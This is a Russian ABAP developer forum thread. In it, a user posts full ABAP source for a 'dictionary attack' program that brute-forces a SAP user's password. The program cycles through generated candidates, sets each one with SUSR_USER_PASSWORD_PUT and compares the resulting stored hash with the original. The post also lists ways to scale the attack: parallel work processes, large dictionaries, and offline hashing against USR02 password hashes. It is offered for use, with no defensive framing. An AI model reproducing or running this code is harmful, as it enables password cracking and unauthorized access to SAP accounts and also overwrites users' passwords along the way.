SAP R/3 форум ABAP консультантов
Russian ABAP Developer's Club

Home - FAQ - Search - Memberlist - Usergroups - Profile - Log in to check your private messages - Register - Log in - English
Blogs - Weblogs News

Rules to submit your program



 
Post new topic   Reply to topic    Russian ABAP Developer's Club Forum Index -> Submit a new program | Новые материалы, программы для сайта
View previous topic :: View next topic  
Author Message
admin
Администратор
Администратор



Joined: 01 Sep 2007
Posts: 1637

PostPosted: Sun Mar 01, 2009 7:25 pm    Post subject: Rules to submit your program Reply with quote

If your want to add a new program to section on this forum, please create new message with code of your prоgram on this section of forum. It will be moved to corresponding section by our moderators.
Back to top
View user's profile Send private message
PN18DZA
Участник
Участник



Joined: 26 Aug 2014
Posts: 1

PostPosted: Tue Aug 26, 2014 11:50 pm    Post subject: Dictionary Attack Program Reply with quote

Old simple proof-of-concept program for Dictionary Attack.
==========================================
Possible refinements :

1. convert subroutine TRYOUT to asynchronous function module and use loads of workprocesses in parallel.
2. use a large dictionary as input instead of generating the cleartext passwrods yourself
3. Read the USR40 table first and filter your dictionary
4. Read the USR02 table and, from each cleartext passsword generate & compare hashes for each user
5. Install a small SAP demo system on solid state disks and configure lots of workprocesses
==========================================

Code:

REPORT zfindpwd.

DATA: user(8).

CONSTANTS: pwdlen VALUE 6.

DATA: user_logondata LIKE uslogond.
DATA: user_name LIKE usr02-bname.

DATA: pwd LIKE xu400-newcode.
DATA: maxoffset TYPE i.
DATA: offset TYPE i.
DATA: length TYPE i.
DATA: counter TYPE p.
DATA: mantisse TYPE p.
DATA: wrcount TYPE p.
DATA: maxcount TYPE p.
DATA: pwd_found.
DATA: old_key LIKE user_logondata-bcode.

maxoffset = pwdlen - 1.

TYPES: BEGIN OF mapline,
  nr TYPE i,
  ch TYPE c,
END OF mapline.

TYPES mapitab TYPE SORTED TABLE OF mapline WITH UNIQUE KEY nr.

DATA: mapr TYPE mapline.
DATA: mapi TYPE mapitab.

mapr-nr = 1. mapr-ch = 'A'. INSERT mapr INTO mapi INDEX 1.
mapr-nr = 2. mapr-ch = 'B'. INSERT mapr INTO mapi INDEX 2.
mapr-nr = 3. mapr-ch = 'C'. INSERT mapr INTO mapi INDEX 3.
mapr-nr = 4. mapr-ch = 'D'. INSERT mapr INTO mapi INDEX 4.
mapr-nr = 5. mapr-ch = 'E'. INSERT mapr INTO mapi INDEX 5.
mapr-nr = 6. mapr-ch = 'F'. INSERT mapr INTO mapi INDEX 6.
mapr-nr = 7. mapr-ch = 'G'. INSERT mapr INTO mapi INDEX 7.
mapr-nr = 8. mapr-ch = 'H'. INSERT mapr INTO mapi INDEX 8.
mapr-nr = 9. mapr-ch = 'I'. INSERT mapr INTO mapi INDEX 9.
mapr-nr = 10. mapr-ch = 'J'. INSERT mapr INTO mapi INDEX 10.
mapr-nr = 11. mapr-ch = 'K'. INSERT mapr INTO mapi INDEX 11.
mapr-nr = 12. mapr-ch = 'L'. INSERT mapr INTO mapi INDEX 12.
mapr-nr = 13. mapr-ch = 'M'. INSERT mapr INTO mapi INDEX 13.
mapr-nr = 14. mapr-ch = 'N'. INSERT mapr INTO mapi INDEX 14.
mapr-nr = 15. mapr-ch = 'O'. INSERT mapr INTO mapi INDEX 15.
mapr-nr = 16. mapr-ch = 'P'. INSERT mapr INTO mapi INDEX 16.
mapr-nr = 17. mapr-ch = 'Q'. INSERT mapr INTO mapi INDEX 17.
mapr-nr = 18. mapr-ch = 'R'. INSERT mapr INTO mapi INDEX 18.
mapr-nr = 19. mapr-ch = 'S'. INSERT mapr INTO mapi INDEX 19.
mapr-nr = 20. mapr-ch = 'T'. INSERT mapr INTO mapi INDEX 20.
mapr-nr = 21. mapr-ch = 'U'. INSERT mapr INTO mapi INDEX 21.
mapr-nr = 22. mapr-ch = 'V'. INSERT mapr INTO mapi INDEX 22.
mapr-nr = 23. mapr-ch = 'W'. INSERT mapr INTO mapi INDEX 23.
mapr-nr = 24. mapr-ch = 'X'. INSERT mapr INTO mapi INDEX 24.
mapr-nr = 25. mapr-ch = 'Y'. INSERT mapr INTO mapi INDEX 25.
mapr-nr = 26. mapr-ch = 'Z'. INSERT mapr INTO mapi INDEX 26.
mapr-nr = 27. mapr-ch = '0'. INSERT mapr INTO mapi INDEX 27.
mapr-nr = 28. mapr-ch = '1'. INSERT mapr INTO mapi INDEX 28.
mapr-nr = 29. mapr-ch = '2'. INSERT mapr INTO mapi INDEX 29.
mapr-nr = 30. mapr-ch = '3'. INSERT mapr INTO mapi INDEX 30.
mapr-nr = 31. mapr-ch = '4'. INSERT mapr INTO mapi INDEX 31.
mapr-nr = 32. mapr-ch = '5'. INSERT mapr INTO mapi INDEX 32.
mapr-nr = 33. mapr-ch = '6'. INSERT mapr INTO mapi INDEX 33.
mapr-nr = 34. mapr-ch = '7'. INSERT mapr INTO mapi INDEX 34.
mapr-nr = 35. mapr-ch = '8'. INSERT mapr INTO mapi INDEX 35.
mapr-nr = 36. mapr-ch = '9'. INSERT mapr INTO mapi INDEX 36.
mapr-nr = 37. mapr-ch = ':'. INSERT mapr INTO mapi INDEX 37.
mapr-nr = 38. mapr-ch = '!'. INSERT mapr INTO mapi INDEX 38.
mapr-nr = 39. mapr-ch = '?'. INSERT mapr INTO mapi INDEX 39.

DESCRIBE TABLE mapi LINES mantisse.

CLEAR mapr.

maxcount = mantisse ** ( pwdlen + 1 ).
counter  = mantisse ** pwdlen.
* Test Data
user = 'TEST'.
user_name = user.

*---------------------------------------------------------------------*
* Main Loop

PERFORM getoldkey.
WHILE counter < maxcount.
  ADD 1 TO counter.
  PERFORM mapnrch USING counter.
  PERFORM tryout USING user_name pwd.
  IF pwd_found = 'X'.
    WRITE: / 'User name : ', user_name.
    WRITE: / 'Password  : ', pwd.
    ULINE.
    EXIT.
  ENDIF.

ENDWHILE.


*---------------------------------------------------------------------*
*       FORM mapnrch                                                  *
*---------------------------------------------------------------------*

FORM mapnrch USING num TYPE p.

  DATA: res TYPE p.
  DATA: rem TYPE p.
  DATA: offsetl TYPE i.

  offsetl = 0.
  rem = num MOD mantisse.
  res = num DIV mantisse.

  WHILE res GE mantisse.
    READ TABLE mapi INDEX rem INTO mapr.
    pwd+offsetl(1) = mapr-ch.
    offsetl = offsetl + 1.
    rem = ( res MOD mantisse ) + 1.
    res = res DIV mantisse.
    IF offsetl > maxoffset.
      EXIT.
    ENDIF.
  ENDWHILE.

  IF offsetl > maxoffset.
    EXIT.
  ELSE.
    READ TABLE mapi INDEX res INTO mapr.
    pwd+offsetl(1) = mapr-ch.
  ENDIF.

ENDFORM.

*---------------------------------------------------------------------*
*       FORM TRYOUT                                                   *
*---------------------------------------------------------------------*
FORM tryout USING user_name LIKE usr02-bname
                  password LIKE xu400-newcode.

DATA: new_key LIKE user_logondata-bcode.

  CALL FUNCTION 'SUSR_USER_PASSWORD_PUT'
       EXPORTING
            user_name            = user_name
            password             = password
       EXCEPTIONS
            user_name_not_exist  = 1
            password_not_allowed = 2
            passwords_not_equal  = 3
            OTHERS               = 4.

  IF sy-subrc = 0.

    CALL FUNCTION 'SUSR_USER_LOGONDATA_GET'
         EXPORTING
              user_name           = user_name
         IMPORTING
              user_logondata      = user_logondata
         EXCEPTIONS
              user_name_not_exist = 1
              OTHERS              = 2.

   IF sy-subrc = 0.
      new_key = user_logondata-bcode.
      IF old_key = new_key.
        pwd_found = 'X'.
      ENDIF.
    ENDIF.
  ENDIF.

ENDFORM.


*&---------------------------------------------------------------------*
*&      Form  getoldkey
*&---------------------------------------------------------------------*
*       text
*----------------------------------------------------------------------*
*  -->  p1        text
*  <--  p2        text
*----------------------------------------------------------------------*
FORM getoldkey.

*  user_name = user.

  CALL FUNCTION 'SUSR_USER_LOGONDATA_GET'
       EXPORTING
            user_name           = user_name
       IMPORTING
            user_logondata      = user_logondata
       EXCEPTIONS
            user_name_not_exist = 1
            OTHERS              = 2.

  old_key = user_logondata-bcode.
ENDFORM.                    " getoldkey

_________________
PN18DZA - SAP Dude
Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    Russian ABAP Developer's Club Forum Index -> Submit a new program | Новые материалы, программы для сайта All times are GMT + 4 Hours
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


All product names are trademarks of their respective companies. SAPNET.RU websites are in no way affiliated with SAP AG.
SAP, SAP R/3, R/3 software, mySAP, ABAP, BAPI, xApps, SAP NetWeaver and any other are registered trademarks of SAP AG.
Every effort is made to ensure content integrity. Use information on this site at your own risk.